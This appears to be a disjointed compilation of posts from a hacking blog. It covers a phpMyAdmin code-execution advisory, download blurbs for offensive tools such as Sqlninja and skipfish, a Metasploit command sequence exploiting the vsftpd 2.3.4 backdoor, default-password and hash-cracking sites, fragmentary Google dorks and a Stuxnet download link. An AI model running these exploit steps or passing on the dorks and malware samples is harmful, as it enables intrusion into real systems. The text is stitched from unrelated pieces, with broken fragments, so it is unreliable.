phpMyAdmin 3.x

1) An error within the "Swekey_login()" function in libraries/auth/swekey/swekey.auth.lib.php can be exploited to overwrite session variables and e.g. inject and execute arbitrary PHP code.

2) Input passed to the "PMA_createTargetTables()" function in libraries/server_synchronize.lib.php is not properly sanitised before calling the "preg_replace()" function with the "e" modifier. This can be exploited to execute arbitrary PHP code via URL-encoded NULL bytes.

3) Input passed to the "PMA_displayTableBody()" function in libraries/display_tbl.lib.php is not properly sanitised before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences.

NOTE: A weakness in setup scripts, which could lead to arbitrary PHP code injection if session variables are overwritten.

The vulnerabilities in versions prior to 3.3.10.2 and 3.4.3.1.

A fully automated, active web application security reconnaissance tool. Key features:
High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets.
Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion.
Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors.

Download:
http://code.google.com/p/skipfish/downloads/list

Some Hacker use software and hardware to express themselves creatively.......


http://www.pentestit.com/wp-content/uploads/HLIC/e57cb16a9284494b6fb328de8e8539d2.png

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
.Linux
.FreeBSD
.Mac OS X

It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:

.ICMP-based shell
.CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
.Header-based injection support

Download:
http://sqlninja.sourceforge.net/download.html

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.
The main focus of this release has been on taking care of some pesky bugs and implementing a few feature requests.

Download: https://github.com/Zapotek/arachni

See Changelog: http://arachni.segfault.gr

Affected versions :
vsftpd-2.3.4 from 2011-06-30

https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5

Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded

discovered by Mathias Kresin

What is HTTrack:
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system. WinHTTrack is the Windows 2000/XP/Vista/Seven release of HTTrack.

Where is the home page?
You can find the official homepage at this URL:
http://www.httrack.com/

Default passwords can be obtained from the following websites:

http://www.phenoelit-us.org/dpl/dpl.html
http://cirt.net/passwords
http://www.defaultpassword.com
http://www.passwordsdatabase.com
http://www.isdpodcast.com/resources/62k-common-passwords/

http://www.insidepro.com/eng/download.shtml
http://www.insidepro.com/tables.php

Malware Analyser is a freeware tool to perform static and dynamic analysis of the malwares.

The features are:

String based analysis for registry, API calls, IRC Commands, DLL’s called and VMAware.

Display detailed headers of PE with all its section details, import and export symbols etc.

On distros, can perform an ASCII dump of the PE along with other options (check –help argument).

For windows, it can generate various section of a PE : DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections
ASCII dump on windows machine.

Code Analysis (disassembling)

Online malware checking (www.virustotal.com)

Check for Packer from the Database.

Tracer functionality: Can be used to identify

Anti-debugging Calls tricks, File system manipulations Calls Rootkit Hooks, Keyboard Hooks, DEP Setting Change, Network Identification traces.

Signature Creation: Allows to create signature of malware.

Batch Mode Scan to Scan all DLL and Exe in directories and sub-directories


Download:
http://beenuarora.com/malware_analyser%203.2.zip

ANTI VIRUS:
1. AVG Anti-Virus Free Edition
http://adf.ly/313683/http://free.avg.com/download-avg-anti-virus-free-edition

2. Avira AntiVir Personal
http://adf.ly/313683/http://www.free-av.com/en/products/1/avira_antivir_personal__free_antivirus.html

3. Avast Home Free Edition
http://adf.ly/313683/http://avast.com/eng/download-avast-home.html

4. PC Tools AntiVirus Free Edition
http://adf.ly/313683/http://www.pctools.com/free-antivirus/

5. Comodo Internet Security
http://adf.ly/313683/http://www.personalfirewall.comodo.com/download_firewall.html

6. MicroWorld Free AntiVirus Toolkit Utility (MWAV)
http://adf.ly/313683/http://http//www.mwti.net/products/mwav/mwav.asp

7. BitDefender Free Edition
http://adf.ly/313683/http://www.bitdefender.com/PRODUCT-14-en--BitDefender-Free-Edition.html

ANTI KEYLOGGER
1. KeyScrambler Personal
Download: http://www.qfxsoftware.com/Download.htm

2. I Hate Keyloggers
Download: http://dewasoft.com/privacy/i-hate-keyloggers.htm#download

3. PSMAntiKeyLogger
Download: http://sourceforge.net/projects/psmantikeyloger/files/

4. SnoopFree Privacy Shield
Download: http://www.snoopfree.com/PrivacyShield.htm

5. MyPlanetSoft Anti-Keylogger
Download: http://www.myplanetsoft.com/free/antikeylog.php

.....categorized by versions

Hoempage:
http://www.mskbfiles.com/

inurl:declaration_more.php?decl_id=
inurl:Pageid="
.......................
.......................

Download:
http://www62.megaupload.com/files/4cef0fdb4a3a7b84ca88ebdce2e54dc5/Neu_Textdokument.txt

Stuxnet is designed to programmatically alter Programmable Logic Controllers (PLCs) used in those facilities. In an ICS environment, the PLCs automate industrial type tasks such as regulating flow rate to maintain pressure and temperature controls.

Download:
http://www.multiupload.com/BDNYSCY5PC

http://youtu.be/7g0pi4J8auQ